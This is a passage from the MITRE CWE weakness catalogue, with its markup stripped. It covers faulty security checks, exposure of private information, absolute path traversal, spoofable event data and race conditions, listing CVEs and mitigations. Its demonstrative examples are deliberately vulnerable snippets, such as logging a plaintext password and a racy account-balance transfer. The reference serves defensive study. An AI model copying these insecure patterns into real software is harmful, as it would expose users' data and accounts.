2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - - - The software does not implement or incorrectly implements one or more security-relevant checks as specified by the design of a standardized algorithm, protocol, or technique. - - - - - - - - - - - - Architecture and Design - - - Implementation - - This is an implementation error, in which the algorithm/technique requires certain security-related behaviors or conditions that are not implemented or checked properly, thus causing a vulnerability. - - - - - - Access Control - Bypass Protection Mechanism - - - - - CVE-2002-0862 - Browser does not verify Basic Constraints of a certificate, even though it is required, allowing spoofing of trusted certificates. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0862 - - - CVE-2002-0970 - Browser does not verify Basic Constraints of a certificate, even though it is required, allowing spoofing of trusted certificates. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0970 - - - CVE-2002-1407 - Browser does not verify Basic Constraints of a certificate, even though it is required, allowing spoofing of trusted certificates. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1407 - - - CVE-2005-0198 - Logic error prevents some required conditions from being enforced during Challenge-Response Authentication Mechanism with MD5 (CRAM-MD5). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0198 - - - CVE-2004-2163 - Shared secret not verified in a RADIUS response packet, allowing authentication bypass by spoofing server replies. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2163 - - - CVE-2005-2181 - Insufficient verification in VoIP implementation, in violation of standard, allows spoofed messages. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2181 - - - CVE-2005-2182 - Insufficient verification in VoIP implementation, in violation of standard, allows spoofed messages. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2182 - - - CVE-2005-2298 - Security check not applied to all components, allowing bypass. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2298 - - - - - Improperly Implemented Security Check for Standard - - - - This is a "missing step" error on the product side, which can overlap weaknesses such as insufficient verification and spoofing. It is frequently found in cryptographic and authentication errors. It is sometimes resultant. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Description - - - CWE Content Team - MITRE - 2009-10-29 - updated Modes_of_Introduction, Observed_Examples, Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The product does not properly prevent a person's private, personal information from being accessed by actors who either (1) are not explicitly authorized to access the information or (2) do not have the implicit consent of the person about whom the information is collected. - - There are many types of sensitive information that products must protect from attackers, including system data, communications, configuration, business secrets, intellectual property, and an individual's personal (private) information. Private personal information may include a password, phone number, geographic location, personal messages, credit card number, etc. Private information is important to consider whether the person is a user of the product, or part of a data set that is processed by the product. An exposure of private information does not necessarily prevent the product from working properly, and in fact the exposure might be intended by the developer, e.g. as part of data sharing with other organizations. However, the exposure of personal private information can still be undesirable or explicitly prohibited by law or regulation. - Some types of private information include: - - - Government identifiers, such as Social Security Numbers - Contact information, such as home addresses and telephone numbers - Geographic location - where the user is (or was) - Employment history - Financial data - such as credit card numbers, salary, bank accounts, and debts - Pictures, video, or audio - Behavioral patterns - such as web surfing history, when certain activities are performed, etc. - Relationships (and types of relationships) with others - family, friends, contacts, etc. - Communications - e-mail addresses, private messages, text messages, chat logs, etc. - Health - medical conditions, insurance status, prescription records - Account passwords and other credentials - - - Some of this information may be characterized as PII (Personally Identifiable Information), Protected Health Information (PHI), etc. Categories of private information may overlap or vary based on the intended usage or the policies and practices of a particular industry. - Sometimes data that is not labeled as private can have a privacy implication in a different context. For example, student identification numbers are usually not considered private because there is no explicit and publicly-available mapping to an individual student's personal information. However, if a school generates identification numbers based on student social security numbers, then the identification numbers should be considered private. - - - - - - - - - - - Privacy violation - - - Privacy leak - - - Privacy leakage - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Implementation - - - Operation - - - - - Confidentiality - Read Application Data - - - - - Architecture or Design Review - - Private personal data can enter a program in a variety of ways: - - - Directly from the user in the form of a password or personal information - Accessed from a database or other data store by the application - Indirectly from a partner or other third party - - If the data is written to an external location - such as the console, file system, or network - a privacy violation may occur. - - - High - - - - - Requirements - - Identify and consult all relevant regulations for personal privacy. An organization may be required to comply with certain federal and state regulations, depending on its location, the type of business it conducts, and the nature of any private data it handles. Regulations may include Safe Harbor Privacy Framework [REF-340], Gramm-Leach Bliley Act (GLBA) [REF-341], Health Insurance Portability and Accountability Act (HIPAA) [REF-342], General Data Protection Regulation (GDPR) [REF-1047], California Consumer Privacy Act (CCPA) [REF-1048], and others. - - - - Architecture and Design - - Carefully evaluate how secure design may interfere with privacy, and vice versa. Security and privacy concerns often seem to compete with each other. From a security perspective, all important operations should be recorded so that any anomalous activity can later be identified. However, when private data is involved, this practice can in fact create risk. Although there are many ways in which private data can be handled unsafely, a common risk stems from misplaced trust. Programmers often trust the operating environment in which a program runs, and therefore believe that it is acceptable store private information on the file system, in the registry, or in other locally-controlled resources. However, even if access to certain resources is restricted, this does not guarantee that the individuals who do have access can be trusted. - - - - - - The following code contains a logging statement that tracks the contents of records added to a database by storing them in a log file. Among other values that are stored, the getPassword() function returns the user-supplied plaintext password associated with the account. - - pass = GetPassword();...dbmsLog.WriteLine(id + ":" + pass + ":" + type + ":" + tstamp); - - The code in the example above logs a plaintext password to the filesystem. Although many developers trust the filesystem as a safe storage location for data, it should not be trusted implicitly, particularly when privacy is a concern. - - - This code uses location to determine the user's current US State location. - First the application must declare that it requires the ACCESS_FINE_LOCATION permission in the application's manifest.xml: - - <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/> - - During execution, a call to getLastLocation() will return a location based on the application's location permissions. In this case the application has permission for the most accurate location possible: - - locationClient = new LocationClient(this, this, this);locationClient.connect();Location userCurrLocation;userCurrLocation = locationClient.getLastLocation();deriveStateFromCoords(userCurrLocation); - - While the application needs this information, it does not need to use the ACCESS_FINE_LOCATION permission, as the ACCESS_COARSE_LOCATION permission will be sufficient to identify which US state the user is in. - - - In 2004, an employee at AOL sold approximately 92 million private customer e-mail addresses to a spammer marketing an offshore gambling web site [REF-338]. In response to such high-profile exploits, the collection and management of private data is becoming increasingly regulated. - - - - - Privacy Violation - - - FIO13-J - Do not log sensitive information outside a trust boundary - - - - - - - - - - - - - - - - - - - - - - This entry overlaps many other entries that are not organized around the kind of sensitive information that is exposed. However, because privacy is treated with such importance due to regulations and other factors, and it may be useful for weakness-finding tools to highlight capabilities that detect personal private information instead of system information, it is not clear whether - and how - this entry should be deprecated. - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Other_Notes - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-12-28 - updated Other_Notes, References - - - CWE Content Team - MITRE - 2010-02-16 - updated Other_Notes, References - - - CWE Content Team - MITRE - 2011-03-29 - updated Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-09-13 - updated Other_Notes, References - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2013-02-21 - updated Applicable_Platforms, References - - - CWE Content Team - MITRE - 2014-02-18 - updated Alternate_Terms, Demonstrative_Examples, Description, Name, Other_Notes, References - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Alternate_Terms, Applicable_Platforms, Demonstrative_Examples, Description, Detection_Factors, Maintenance_Notes, Name, Potential_Mitigations, References, Relationships, Type - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated References - - Privacy Violation - Exposure of Private Information ('Privacy Violation') - - - - The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize absolute path sequences such as "/abs/path" that can resolve to a location that is outside of that directory. - This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries. - - - Integrity - Modify Files or Directories - The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication. - - - Confidentiality - Read Files or Directories - The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system. - - - Availability - DoS: Crash, Exit, or Restart - The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software. - - - - - In the example below, the path to a dictionary file is read from a system property and used to initialize a File object. - - String filename = System.getProperty("com.domain.application.dictionaryFile");File dictionaryFile = new File(filename); - - However, the path is not validated or modified to prevent it from containing relative or absolute path sequences before creating the File object. This allows anyone who can control the system property to determine what file is used. Ideally, the path should be resolved relative to some kind of application or user home directory. - - - - - CVE-2002-1345 - Multiple FTP clients write arbitrary files via absolute paths in server responses - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1345 - - - CVE-2001-1269 - ZIP file extractor allows full path - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1269 - - - CVE-2002-1818 - Path traversal using absolute pathname - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1818 - - - CVE-2002-1913 - Path traversal using absolute pathname - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1913 - - - CVE-2005-2147 - Path traversal using absolute pathname - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2147 - - - CVE-2000-0614 - Arbitrary files may be overwritten via compressed attachments that specify absolute path names for the decompressed output. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0614 - - - CVE-1999-1263 - Mail client allows remote attackers to overwrite arbitrary files via an e-mail message containing a uuencoded attachment that specifies the full pathname for the file to be modified. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1263 - - - CVE-2003-0753 - Remote attackers can read arbitrary files via a full pathname to the target file in config parameter. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0753 - - - CVE-2002-1525 - Remote attackers can read arbitrary files via an absolute pathname. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1525 - - - CVE-2001-0038 - Remote attackers can read arbitrary files by specifying the drive letter in the requested URL. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0038 - - - CVE-2001-0255 - FTP server allows remote attackers to list arbitrary directories by using the "ls" command and including the drive letter name (e.g. C:) in the requested pathname. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0255 - - - CVE-2001-0933 - FTP server allows remote attackers to list the contents of arbitrary drives via a ls command that includes the drive letter as an argument. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0933 - - - CVE-2002-0466 - Server allows remote attackers to browse arbitrary directories via a full pathname in the arguments to certain dynamic pages. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0466 - - - CVE-2002-1483 - Remote attackers can read arbitrary files via an HTTP request whose argument is a filename of the form "C:" (Drive letter), "//absolute/path", or ".." . - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1483 - - - CVE-2004-2488 - FTP server read/access arbitrary files using "C:\" filenames - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2488 - - - CVE-2001-0687 - FTP server allows a remote attacker to retrieve privileged web server system information by specifying arbitrary paths in the UNC format (\\computername\sharename). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0687 - - - - - Absolute Path Traversal - - - SFP16 - Path Traversal - - - - - - - - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2010-02-16 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-06-21 - updated Demonstrative_Examples, Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-01-19 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - - - Security based on event locations are insecure and can be spoofed. - Events are a messaging system which may provide control data to programs listening for events. Events often do not have any type of authentication framework to allow them to be verified from a trusted source. Any application, in Windows, on a given desktop can send a message to any window on the same desktop. There is no authentication framework for these messages. Therefore, any message can be used to manipulate any process on the desktop if the process does not check the validity and safeness of those messages. - - - - - - - - - Architecture and Design - - - Implementation - - - High - - - Integrity - Confidentiality - Availability - Access Control - Gain Privileges or Assume Identity - Execute Unauthorized Code or Commands - If one trusts the system-event information and executes commands based on it, one could potentially take actions based on a spoofed identity. - - - - - Architecture and Design - Never trust or rely any of the information in an Event for security. - - - - - This example code prints out secret information when an authorized user activates a button: - - public void actionPerformed(ActionEvent e) {if (e.getSource() == button) {System.out.println("print out secret information");}} - - This code does not attempt to prevent unauthorized users from activating the button. Even if the button is rendered non-functional to unauthorized users in the application UI, an attacker can easily send a false button press event to the application window and expose the secret information. - - - - - Trust of system event data - - - SFP29 - Faulty endpoint authentication - - - - - - - - CLASP - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-02-16 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - - - The program contains a code sequence that can run concurrently with other code, and the code sequence requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence that is operating concurrently. - - This can have security implications when the expected synchronization is in security-critical code, such as recording whether a user is authenticated or modifying important state information that should not be influenced by an outsider. - A race condition occurs within concurrent environments, and is effectively a property of a code sequence. Depending on the context, a code sequence may be in the form of a function call, a small number of instructions, a series of program invocations, etc. - A race condition violates these properties, which are closely related: - - - Exclusivity - the code sequence is given exclusive access to the shared resource, i.e., no other code sequence can modify properties of the shared resource before the original sequence has completed execution. - Atomicity - the code sequence is behaviorally atomic, i.e., no other thread or process can concurrently execute the same sequence of instructions (or a subset) against the same resource. - - - A race condition exists when an "interfering code sequence" can still access the shared resource, violating exclusivity. Programmers may assume that certain code sequences execute too quickly to be affected by an interfering code sequence; when they are not, this violates atomicity. For example, the single "x++" statement may appear atomic at the code layer, but it is actually non-atomic at the instruction layer, since it involves a read (the original value of x), followed by a computation (x+1), followed by a write (save the result to x). - The interfering code sequence could be "trusted" or "untrusted." A trusted interfering code sequence occurs within the program; it cannot be modified by the attacker, and it can only be invoked indirectly. An untrusted interfering code sequence can be authored directly by the attacker, and typically it is external to the vulnerable program. - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - Medium - - - Availability - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - DoS: Resource Consumption (Other) - When a race condition makes it possible to bypass a resource cleanup routine or trigger multiple initialization routines, it may lead to resource exhaustion (CWE-400). - - - Availability - DoS: Crash, Exit, or Restart - DoS: Instability - When a race condition allows multiple control flows to access a resource simultaneously, it might lead the program(s) into unexpected states, possibly resulting in a crash. - - - Confidentiality - Integrity - Read Files or Directories - Read Application Data - When a race condition is combined with predictable resource names and loose permissions, it may be possible for an attacker to overwrite or access confidential data (CWE-59). - - - - - Black Box - Black box methods may be able to identify evidence of race conditions via methods such as multiple simultaneous connections, which may cause the software to become instable or crash. However, race conditions with very narrow timing windows would not be detectable. - - - White Box - Common idioms are detectable in white box analysis, such as time-of-check-time-of-use (TOCTOU) file operations (CWE-367), or double-checked locking (CWE-609). - - - Automated Dynamic Analysis - - This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. - Race conditions may be detected with a stress-test by calling the software simultaneously from a large number of threads or processes, and look for evidence of any unexpected behavior. - Insert breakpoints or delays in between relevant code statements to artificially expand the race window so that it will be easier to detect. - - Moderate - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - - - Cost effective for partial coverage: - - - Binary Weakness Analysis - including disassembler + source code weakness analysis - - - - - High - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Web Application Scanner - Web Services Scanner - Database Scanners - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Framework-based Fuzzer - - - Cost effective for partial coverage: - - - Fuzz Tester - Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious - - - - - High - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Manual Source Code Review (not inspections) - - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - High - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Architecture and Design - In languages that support it, use synchronization primitives. Only wrap these around critical code to minimize the impact on performance. - - - Architecture and Design - Use thread-safe capabilities such as the data access abstraction in Spring. - - - Architecture and Design - - Minimize the usage of shared resources in order to remove as much complexity as possible from the control flow and to reduce the likelihood of unexpected conditions occurring. - Additionally, this will minimize the amount of synchronization necessary and may even help to reduce the likelihood of a denial of service where an attacker may be able to repeatedly trigger a critical section (CWE-400). - - - - Implementation - When using multithreading and operating on shared variables, only use thread-safe functions. - - - Implementation - Use atomic operations on shared variables. Be wary of innocent-looking constructs such as "x++". This may appear atomic at the code layer, but it is actually non-atomic at the instruction layer, since it involves a read, followed by a computation, followed by a write. - - - Implementation - Use a mutex if available, but be sure to avoid related weaknesses such as CWE-412. - - - Implementation - Avoid double-checked locking (CWE-609) and other implementation errors that arise when trying to avoid the overhead of synchronization. - - - Implementation - Disable interrupts or signals over critical parts of the code, but also make sure that the code does not go into a large or infinite loop. - - - Implementation - Use the volatile type modifier for critical variables to avoid unexpected compiler optimization or reordering. This does not necessarily solve the synchronization problem, but it can help. - - - Architecture and Design - Operation - Environment Hardening - Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. - - - - - This code could be used in an e-commerce application that supports transfers between accounts. It takes the total amount of the transfer, sends it to the new account, and deducts the amount from the original account. - - $transfer_amount = GetTransferAmount();$balance = GetBalanceFromDatabase(); - if ($transfer_amount < 0) {FatalError("Bad Transfer Amount");}$newbalance = $balance - $transfer_amount;if (($balance - $transfer_amount) < 0) {FatalError("Insufficient Funds");}SendNewBalanceToDatabase($newbalance);NotifyUser("Transfer of $transfer_amount succeeded.");NotifyUser("New balance: $newbalance"); - - A race condition could occur between the calls to GetBalanceFromDatabase() and SendNewBalanceToDatabase(). - Suppose the balance is initially 100.00. An attack could be constructed as follows: - - In the following pseudocode, the attacker makes two simultaneous calls of the program, CALLER-1 and CALLER-2. Both callers are for the same user account.CALLER-1 (the attacker) is associated with PROGRAM-1 (the instance that handles CALLER-1). CALLER-2 is associated with PROGRAM-2.CALLER-1 makes a transfer request of 80.00.PROGRAM-1 calls GetBalanceFromDatabase and sets $balance to 100.00PROGRAM-1 calculates $newbalance as 20.00, then calls SendNewBalanceToDatabase().Due to high server load, the PROGRAM-1 call to SendNewBalanceToDatabase() encounters a delay.CALLER-2 makes a transfer request of 1.00.PROGRAM-2 calls GetBalanceFromDatabase() and sets $balance to 100.00. This happens because the previous PROGRAM-1 request was not processed yet.PROGRAM-2 determines the new balance as 99.00.After the initial delay, PROGRAM-1 commits its balance to the database, setting it to 20.00.PROGRAM-2 sends a request to update the database, setting the balance to 99.00 - - At this stage, the attacker should have a balance of 19.00 (due to 81.00 worth of transfers), but the balance is 99.00, as recorded in the database. - To prevent this weakness, the programmer has several options, including using a lock to prevent multiple simultaneous requests to the web application, or using a synchronization mechanism that includes all the code between GetBalanceFromDatabase() and SendNewBalanceToDatabase(). - - - The following function attempts to acquire a lock in order to perform operations on a shared resource. - - void f(pthread_mutex_t *mutex) { - pthread_mutex_lock(mutex); - - /* access shared resource */ - - - pthread_mutex_unlock(mutex); - } - - However, the code does not check the value returned by pthread_mutex_lock() for errors. If pthread_mutex_lock() cannot acquire the mutex for any reason, the function may introduce a race condition into the program and result in undefined behavior. - In order to avoid data races, correctly written programs must check the result of thread synchronization functions and appropriately handle all errors, either by attempting to recover from them or reporting them to higher levels. - - int f(pthread_mutex_t *mutex) { - int result; - result = pthread_mutex_lock(mutex);if (0 != result)return result; - - - /* access shared resource */ - - - return pthread_mutex_unlock(mutex); - } - - - - Suppose a processor's Memory Management Unit (MMU) has 5 other shadow MMUs to distribute its workload for its various cores. Each MMU has the start address and end address of "accessible" memory. Any time this accessible range changes (as per the processor's boot status), the main MMU sends an update message to all the shadow MMUs. - Suppose the interconnect fabric does not prioritize such "update" packets over other general traffic packets. This introduces a race condition. If an attacker can flood the target with enough messages so that some of those attack packets reach the target before the new access ranges gets updated, then the attacker can leverage this scenario. - - - - - CVE-2019-18827 - chain: JTAG interface is not disabled (CWE-1191) during ROM code execution, introducing a race condition (CWE-362) to extract encryption keys - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18827 - - - CVE-2014-8273 - Chain: chipset has a race condition (CWE-362) between when an interrupt handler detects an attempt to write-enable the BIOS (in violation of the lock bit), and when the handler resets the write-enable bit back to 0, allowing attackers to issue BIOS writes during the timing window [REF-1237]. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8273 - - - CVE-2008-5044 - Race condition leading to a crash by calling a hook removal procedure while other activities are occurring at the same time. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5044 - - - CVE-2008-2958 - chain: time-of-check time-of-use (TOCTOU) race condition in program allows bypass of protection mechanism that was designed to prevent symlink attacks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2958 - - - CVE-2008-1570 - chain: time-of-check time-of-use (TOCTOU) race condition in program allows bypass of protection mechanism that was designed to prevent symlink attacks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1570 - - - CVE-2008-0058 - Unsynchronized caching operation enables a race condition that causes messages to be sent to a deallocated object. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0058 - - - CVE-2008-0379 - Race condition during initialization triggers a buffer overflow. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0379 - - - CVE-2007-6599 - Daemon crash by quickly performing operations and undoing them, which eventually leads to an operation that does not acquire a lock. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6599 - - - CVE-2007-6180 - chain: race condition triggers NULL pointer dereference - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6180 - - - CVE-2007-5794 - Race condition in library function could cause data to be sent to the wrong process. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5794 - - - CVE-2007-3970 - Race condition in file parser leads to heap corruption. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3970 - - - CVE-2008-5021 - chain: race condition allows attacker to access an object while it is still being initialized, causing software to access uninitialized memory. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5021 - - - CVE-2009-4895 - chain: race condition for an argument value, possibly resulting in NULL dereference - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4895 - - - CVE-2009-3547 - chain: race condition might allow resource to be released before operating on it, leading to NULL dereference - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547 - - - - - Race Conditions - - - VNA03-J - Do not assume that a group of calls to independently atomic methods is atomic - - - - - - - - - - - - - - - - - - - - - - The relationship between race conditions and synchronization problems (CWE-662) needs to be further developed. They are not necessarily two perspectives of the same core concept, since synchronization is only one technique for avoiding race conditions, and synchronization can be used for other purposes besides race condition prevention. - Race conditions in web applications are under-studied and probably under-reported. However, in 2008 there has been growing interest in this area. - Much of the focus of race condition research has been in Time-of-check Time-of-use (TOCTOU) variants (CWE-367), but many race conditions are related to synchronization problems that do not necessarily require a time-of-check. - From a classification/taxonomy perspective, the relationships between concurrency and program state need closer investigation and may be useful in organizing related issues. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Relationships - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Maintenance_Notes, Observed_Examples, Potential_Mitigations, References, Relationships, Research_Gaps - - - CWE Content Team - MITRE - 2009-03-10 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2009-05-27 - updated Relationships - - - CWE Content Team - MITRE - 2010-02-16 - updated Detection_Factors, References, Relationships - - - CWE Content Team - MITRE - 2010-06-21 - updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2010-09-27 - updated Observed_Examples, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2010-12-13 - updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Demonstrative_Examples, References, Research_Gaps, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Demonstrative_Examples, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 